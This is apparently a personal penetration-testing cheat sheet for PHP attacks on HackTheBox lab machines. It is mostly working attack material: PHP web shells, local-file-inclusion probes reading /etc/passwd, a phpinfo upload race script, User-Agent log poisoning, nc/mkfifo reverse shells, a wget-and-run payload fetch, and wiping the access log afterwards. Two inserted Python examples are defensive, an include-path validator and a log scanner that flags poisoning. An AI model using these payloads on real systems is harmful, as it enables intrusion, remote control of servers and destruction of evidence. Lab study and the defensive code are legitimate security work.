php

Last updated 2 years ago

Basics

  • Combined with a Local File Inclusion (LFI), you can make php get you a shell

  • REF: ninevehHTB

  • Make sure to URL-encode your injection

Reverse Shell

  • Two options to try:

<?php system($_GET["cmd"]); ?>               ..should work
<?php echo system($_REQUEST ["cmd"]); ?>     ..one I normally see

http://web/hi.php?notes=/../note.php&cmd=nc -e /bin/sh 10.x.x.x 4444
http://web/hi.php?notes=/../note.php&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 > /tmp/f

Downloading

<?php system("wget $IP/shell.php -O /tmp/shell.php; php /tmp/shell.php"); ?>

php explore

  • REF: poisonHTB

https://$IP/phpinfo.php                 ..Found: file_uploads 'On'
https://$IP/browse.php                  ..page can run local php scripts
https://$IP/browse.php?file=Hello       ..fail
https://$IP/browse.php?file=index.php   ..ok

Encode to view Source:
https://$IP/browse.php?file=php://filter/convert.base64-encode/resource=index.php   ..encodes b64
echo PD9waHAKcHJ.. | base64 -d  ..<?php print_r(ini_get_all());?>

https://$IP/browse.php?file=http://$MyIP/Anyfile   ..http wrapper disabled
https://$IP/browse.php?file=ftp://$MyIP/Anyfile    ..ftp wrapper disabled
https://$IP/browse.php?file=expect://ls            ..unable to find wrapper
https://$IP/browse.php?file=/etc/passwd            ..ok (found username)
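Every probe above goes through the single file= parameter of browse.php, and each one succeeds or fails depending on how the server filters that value. As an added example (not code from this page or from the boxes it references), the Python function below shows the check such an endpoint needs before including anything: reject stream wrappers, NUL bytes, absolute paths and traversal, and serve only allowlisted files under a fixed directory. The web root, the index.php inside it and the extension allowlist are constructed for the demo.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import urlsplit

# Constructed demo web root holding the one page browse.php is meant to serve.
WEBROOT = tempfile.mkdtemp(prefix="webroot-")
with open(os.path.join(WEBROOT, "index.php"), "w") as fh:
    fh.write("<?php echo 'hello'; ?>\n")

# Only these extensions may be served; anything else (e.g. "Hello", passwd) is refused.
ALLOWED_EXT = {".php", ".html"}


def resolve_include(user_value: str, base_dir: str = WEBROOT) -> Optional[str]:
    """Return an absolute path under base_dir, or None if the value must be rejected.

    Rejection rules, in order:
      1. NUL bytes (older PHP truncated paths at the first NUL)
      2. anything carrying a scheme: php://filter, expect://, http://, ftp://, data:, ...
      3. absolute paths such as /etc/passwd
      4. traversal: the resolved real path must stay inside base_dir
      5. extension not on the allowlist, or the file does not exist
    """
    if "\x00" in user_value:
        return None
    # urlsplit() reports a scheme for 'php://filter/...' and 'expect://ls' alike.
    if urlsplit(user_value).scheme:
        return None
    if os.path.isabs(user_value):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    # realpath() collapses '..' and symlinks, so a prefix check is reliable here.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


# The values tried in the walkthrough above, plus a plain traversal attempt.
PROBES = [
    "Hello",
    "index.php",
    "php://filter/convert.base64-encode/resource=index.php",
    "http://attacker.example/Anyfile",
    "ftp://attacker.example/Anyfile",
    "expect://ls",
    "/etc/passwd",
    "../../../../etc/passwd",
]

if __name__ == "__main__":
    for probe in PROBES:
        result = resolve_include(probe)
        print(f"{probe!r:60} -> {'serve ' + result if result else 'REJECT'}")
```

Only index.php survives; every wrapper, the absolute path and the traversal attempt are refused before any file is opened, which is the behaviour the probes above show is missing.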

phpinfo - fileupload - vulnerability

  • Check the options shown by phpinfo.php

  • If 'file_uploads = On', the server will accept any file you send

  • php saves it to a temporary directory (normally not reachable by users)

  • But with an LFI you may get code execution

  • Test with Burp Intercept:

POST /phpinfo.php HTTP/1.1
Host: $IP
Content-Type: multipart/form-data; boundary=--HelloWorld

----HelloWorld
Content-Disposition: form-data; name="blah"; filename="TestFile"
Content-Type: text/plain

Does this work
----HelloWorld--

View phpinfo results to see if our file was accepted:
"PHP Variables"            ..header
_FILES["blah"]             ..found!

phpinfo - LFI

Edit phpinfolfi.py:

Replace the PAYLOAD with a full reverse-shell payload:
PAYLOAD="""$s\r<?php...;?> \r""" % TAG
(keep all the weird bits; just swap the php line <?php...;?>)

locate php-reverse
php-reverse-shell.php
Paste it into phpinfolfi.py as 'payload' (<?php...?>), update the ip and port, and delete the comments.

Point the LFI request at the vulnerable page:
LFIREQ="""GET... /browse.php?file=%s HTTP/1.1\r

The tmp_name search has to match the HTML output of phpinfo ('>' is shown as '&gt;'):
i = d.find("[tmp_name] =>")    ..problem
i = d.find("[tmp_name] =&gt")  ..fixed (appears twice in the script)

Run it:
python phpinfolfi.py $IP 80 100
.. port 80
.. threads 100

nc -nvlp 9001  ..got a shell

Log Poisoning

  • Submit an evil log entry (custom User-Agent)

  • Execute it by viewing the log through the LFI

  • If the php tags do not show up in the rendered log, they were interpreted, and we can inject our payload

TEST 1

View the log (requests to browse.php are written to /var/log/httpd-access.log):
curl https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log

Burp > Repeater > custom "User-Agent"
https://$IP/doesntmatter
User-Agent: Hello World

Confirm:
"Hello World" appears in the log as the User-Agent.
We control this field, so a malicious payload can be sent here.

TEST 2

Burp > Repeater > custom "User-Agent"
https://$IP/doesntmatter
User-Agent: <?php echo('Hello World'); ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
We see "Hello World" in the log.
The php tags were interpreted (i.e. they are not written out in plain text).
Meaning we have execution!

EXPLOIT

Burp > Repeater > custom "User-Agent"
GET /doesntmatter HTTP/1.1
User-Agent: <?php system($_REQUEST['cmd']) ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=hostname
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls -la
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=uname -a
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f
(might need Burp URL-encode)

nc -nvlp 4444  ..connected!

BSD reverse netcat

BSD doesn't like the 'normal' reverse:

normal:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 9002 >/tmp/f

bsd version:
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.x.x.x 4444 >/tmp/f            ..ippsec
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f   ..maybe

Log issue:

vi /var/log/httpd-access.log
Delete our bad line from the earlier mistake (oops): we used echo "Hello World" with double quotes.

Wipe the log file:
echo "" > httpd-access.log
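The php explore probes and the log-poisoning steps above all leave traces in the same httpd-access.log, and the poisoning chain is visible as two events from one client: a PHP tag landing in a logged header, then the log file being pulled through the include. As an added example (not from this page or the referenced boxes), this Python scanner classifies combined-format access log lines for exactly those signals and correlates them per source IP. The log lines, IPs and timestamps are constructed; the User-Agent payload is the harmless echo() from TEST 2.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache/nginx "combined" format. The User-Agent is the last quoted field,
# which is the field the poisoning step above writes into.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

PHP_TAG_RE = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
WRAPPER_RE = re.compile(r"^(?:(?:php|expect|file|phar|zip|glob)://|data:)", re.IGNORECASE)
TRAVERSAL = ("../", "..\\")
SENSITIVE_PATHS = ("/etc/passwd", "/proc/self/", "/var/log/")
LOG_PATHS = ("/var/log/", "access.log", "error.log")


def classify(line):
    """Parse one log line; return a dict with a sorted 'findings' list, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = set()
    # 1. Poisoning attempt: a PHP open tag written into a header that gets logged.
    if PHP_TAG_RE.search(m["ua"]) or PHP_TAG_RE.search(m["referer"]):
        findings.add("php_tag_in_header")
    # 2. LFI probes: inspect every query value after URL decoding. parse_qsl decodes
    #    once (%2F -> /); the extra unquote() catches double-encoded %252F.
    query = m["target"].partition("?")[2]
    for _, raw in parse_qsl(query, keep_blank_values=True):
        low = unquote(raw).lower()
        if WRAPPER_RE.match(low):
            findings.add("stream_wrapper")
        if any(t in low for t in TRAVERSAL):
            findings.add("traversal")
        if any(p in low for p in SENSITIVE_PATHS):
            findings.add("sensitive_path")
        if any(p in low for p in LOG_PATHS):
            findings.add("log_file_read")
    return {"ip": m["ip"], "target": m["target"], "ua": m["ua"], "findings": sorted(findings)}


def scan(lines):
    """Return (hits, chain_ips): the suspicious entries, and the IPs that both planted a
    PHP tag in a header and read a log file through the include (the poisoning chain)."""
    hits = [c for c in map(classify, lines) if c and c["findings"]]
    planted = {h["ip"] for h in hits if "php_tag_in_header" in h["findings"]}
    read_log = {h["ip"] for h in hits if "log_file_read" in h["findings"]}
    return hits, sorted(planted & read_log)


# Constructed sample log following the walkthrough above: one benign view, two LFI
# probes, the TEST 2 User-Agent, then the log pulled through browse.php.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2023:10:00:01 +0000] "GET /browse.php?file=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Mar/2023:10:00:05 +0000] "GET /browse.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Mar/2023:10:00:09 +0000] "GET /browse.php?file=../../../../etc/passwd HTTP/1.1" 200 1400 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Mar/2023:10:00:12 +0000] "GET /doesntmatter HTTP/1.1" 404 209 "-" "<?php echo(\'Hello World\'); ?>"',
    '10.0.0.7 - - [10/Mar/2023:10:00:15 +0000] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=hostname HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits, chain = scan(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["findings"], h["target"])
    print("log-poisoning chain from:", chain)
```

The per-line findings are deliberately coarse (a wrapper prefix, a traversal token, a known sensitive path); the correlation in scan() is what separates a noisy scanner from the chain this page walks through, and it is also why, from a defender's side, the log file should never be readable by the web application that writes it.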

Github > > FileInclusion > phpinfolfi.py

REF: poisonHTB
https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf

Links:
  • PayloadAllTheThings
  • php
  • Local File Inclusion
  • phpLite
  • WebInjections
  • MeyerWeb
  • ReverseShells
  • Burp